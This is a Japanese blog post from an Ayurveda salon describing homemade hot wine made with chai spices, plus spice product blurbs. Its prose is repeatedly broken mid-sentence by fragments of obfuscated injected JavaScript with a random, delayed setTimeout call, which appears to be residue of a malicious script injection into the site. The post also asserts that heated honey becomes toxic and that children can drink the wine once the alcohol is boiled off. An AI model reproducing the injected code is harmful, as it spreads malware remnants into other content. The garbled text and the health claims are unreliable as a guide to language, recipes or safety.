ホットワインでほっこり☆

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
週末から東京はすごく寒かったんです
(今日はポカポカなんですけどw)
そんな中、近所のディスカウントスーパーに立ち寄ったら
ワインが300円で売ってまして。
ホットワインが飲みたい~!andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}と。
実は以前、友人宅でごちそうになったことがあったのですが
あっためた赤ワインに、スパイスとレーズンとナッツなんかを
入れて飲むと、とても飲みやすくてあったまったんですよねー
で、その場でレシピを検索した結果、
必要なスパイスがほとんどチャイと一緒なことが判明andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
それなら、おうちにありますよー
あと入れるものは、オレンジとかレモンとかレーズンとかナッツとか、
レシピによっていろいろなのですが、
フルーツも、なければオレンジピールとか市販のジュース、
ポッカレモンとかでもなんとかなるみたいだし、
自分の好みで入れたらいいんだな、と勝手に解釈しました。(笑)
そして、一番大切だったのは、ホットワインには高いワインより
安いワインの方が向いてるんだそうです

よかった~~
そんなわけで、ホットワイン作成開始andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
使ったスパイスはこちら。
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シナモン、ブラックペッパー、コリアンダー、
クローブ、カルダモン
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…量は適当です。(笑)
最重要なのは、どのレシピにも入っていたクローブで、
次点はシナモンですかね。
まあたくさんなくても、その二つがあれば良さそう。
残念ながら、今回はフルーツがなかったので、
レーズンのみ投入することに。
酸味がほしかったら、ポッカレモンで調整予定。
あとは、ワインの甘さによって、
お砂糖とかはちみつを入れるようです。

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これも、きっと好みですよね。
ただし、アーユルヴェーダでは、
はちみつは加熱するとアーマ(毒素)になるandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
とされていますので、

はちみつを入れて煮てはいけません。andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
はちみつを入れるなら、作り終わって飲み頃の温度になってから
(まあ、指を入れても熱くない程度ですね)
カップに入れてくださいね。andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

でもって、作り方もいろいろ。
「沸騰させないように」とあったり
「アルコールが苦手なら20分火にかけて飛ばす」とか
「専用ポットで作る」とかいっぱいあったので
とりあえず、普通に鍋にマグ一杯分の赤ワインと
引き揚げやすいようにだしパックに入れたスパイスと
温めてみました。
火は中火にしたんですが、普通に沸騰してしまったので(笑)
ちょっとアルコール飛ばして、お砂糖を投入。
味見もしないで、ポッカレモンも少々。
そして完成~andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
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適当に作った割に、味は大丈夫でした
期待通り、とてもあったまりましたよ~
アルコールをしっかり飛ばしてしまえば
お子様でも飲めそうですね。
ぜひ、みなさまもお試しを~

価格:980円
刺激的な香りと味のスパイス。胃腸の働きを整える働きも

 

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インド料理に欠かせないスパイスの一つ。日本でも使いますね

 

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菓子の香り付けや、マサラティーのスパイスとして

 

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日本でもおなじみのこしょう。特大ボトルです

 

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カレーやスープ、世界中で使われています

アーユルヴェーダサロンmanas 《マナス》

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